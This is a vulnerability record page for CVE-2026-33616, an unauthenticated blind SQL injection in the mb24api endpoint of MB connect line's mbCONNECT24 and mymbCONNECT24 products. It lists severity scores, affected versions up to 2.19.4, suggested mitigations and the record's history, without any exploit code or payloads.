CVE-2026-33616 - Vulnerability Details

- MB connect line mbCONNECT24 vulnerable to an unauthenticated SQL injection in the mb24api Endpoint

Description

An unauthenticated remote attacker can exploit an unauthenticated blind SQL Injection vulnerability in the mb24api endpoint due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality.

Published: 2026-04-02

Score: 7.5 High

EPSS: < 1% Very Low

KEV: No

Impact:

Action:

Analysis

Impact

The vulnerability is an unauthenticated blind SQL injection in the mb24api endpoint of MB connect line products, allowing a remote attacker to retrieve arbitrary data from the database. Because the injection occurs without authentication, any user can exploit it, potentially exposing all information stored within the system. The weakness corresponds to CWE-89 and results in a complete loss of confidentiality, as attacker‑controlled queries can return sensitive content.

Affected Systems

Products affected are mbCONNECT24 and mymbCONNECT24 from MB connect line. Version information was not disclosed in the advisory, so administrators should verify whether their current installations encompass the vulnerable code base. The defect resides in the mb24api component responsible for handling external API calls.

Risk and Exploitability

The CVSS score of 7.5 indicates a high severity vulnerability with significant impact on confidentiality. EPSS data is not available, but the absence of the vulnerability from KEV catalog suggests no widely known active exploits yet; however, the blind nature of the injection and lack of authentication requirements increase its attractiveness to attackers. Exploitation would involve sending crafted input to the mb24api endpoint over the network, bypassing any standard authentication mechanism, and then reading the returned data, which could contain sensitive business information.

Default status is the baseline for the product, each version can override it (e.g. patched versions marked unaffected).

Vendor Product Default status Versions

MB connect line

mbCONNECT24

unaffected

Version	Status	Constraints
`0.0.0`	affected	≤ 2.19.4

MB connect line

mymbCONNECT24

unaffected

Version	Status	Constraints
`0.0.0`	affected	≤ 2.19.4

No data.

Vendor Product Confidence Versions

Mbconnectline

Mbconnect24

96%

Version	Status	Scheme	Platform
`[0.0.0,2.19.4]`	affected	semver	—

Mbconnectline

Mymbconnect24

96%

Version	Status	Scheme	Platform
`[0.0.0,2.19.4]`	affected	semver	—

Found an issue or want to improve our Enrichment? You can suggest it directly by opening an issue on our dedicated GitHub repository .

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

Apply the vendor patch or upgrade the mbCONNECT24/mymbCONNECT24 software to a version that includes the fix for the mb24api endpoint.
If a patch is not yet available, restrict network access to the mb24api endpoint, allowing only trusted hosts or IP ranges.
Monitor the API logs for anomalous query patterns or repeated failed authentication attempts, as these may indicate ongoing exploitation.
Validate all input to the API manually or via security controls to ensure no further injection vectors remain.
Consider segmenting the network or placing the database behind an additional firewall to limit exposure.

Generated by OpenCVE AI on April 2, 2026 at 10:20 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

No CVSS v4.0

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact None

Availability Impact None

User Interaction None

No CVSS v3.0

No CVSS v2

This CVE is not in the KEV list.

The EPSS score is 0.00049.

Exploitation none

Automatable yes

Technical Impact partial

References

Link	Providers
https://certvde.com/de/advisories/VDE-2026-030
https://mbconnectline.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2026-030.json

History

Thu, 02 Apr 2026 20:30:00 +0000

Type	Values Removed	Values Added
First Time appeared		Mbconnectline Mbconnectline mbconnect24 Mbconnectline mymbconnect24
Vendors & Products		Mbconnectline Mbconnectline mbconnect24 Mbconnectline mymbconnect24

Thu, 02 Apr 2026 14:15:00 +0000

Type	Values Removed	Values Added
Metrics		ssvc `{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}`

Thu, 02 Apr 2026 09:30:00 +0000

Type	Values Removed	Values Added
Description		An unauthenticated remote attacker can exploit an unauthenticated blind SQL Injection vulnerability in the mb24api endpoint due to improper neutralization of special elements in a SQL SELECT command. This can result in a total loss of confidentiality.
Title		MB connect line mbCONNECT24 vulnerable to an unauthenticated SQL injection in the mb24api Endpoint
Weaknesses		CWE-89
References		https://certvde.com/de/advisories/VDE-2026-030 https://mbconnectline.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2026-030.json
Metrics		cvssV3_1 `{'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}`

Subscriptions

Mbconnectline Mbconnect24 Mymbconnect24

MITRE

Status: PUBLISHED

Assigner: CERTVDE

Published: 2026-04-02T08:59:55.743Z

Updated: 2026-04-02T13:08:18.951Z

Reserved: 2026-03-23T13:15:49.382Z

Link: CVE-2026-33616

Vulnrichment

Updated: 2026-04-02T13:08:15.347Z

NVD

Status : Awaiting Analysis

Published: 2026-04-02T10:16:17.080

Modified: 2026-04-03T16:10:52.680

Link: CVE-2026-33616

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-02T20:21:36Z

Weaknesses

CWE-89

Impact

Affected Systems

Risk and Exploitability

Tracking

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact None

Availability Impact None

User Interaction None

Exploitation none

Automatable yes

Technical Impact partial

Subscriptions

JSON object

JSON object

JSON object

JSON object

JSON object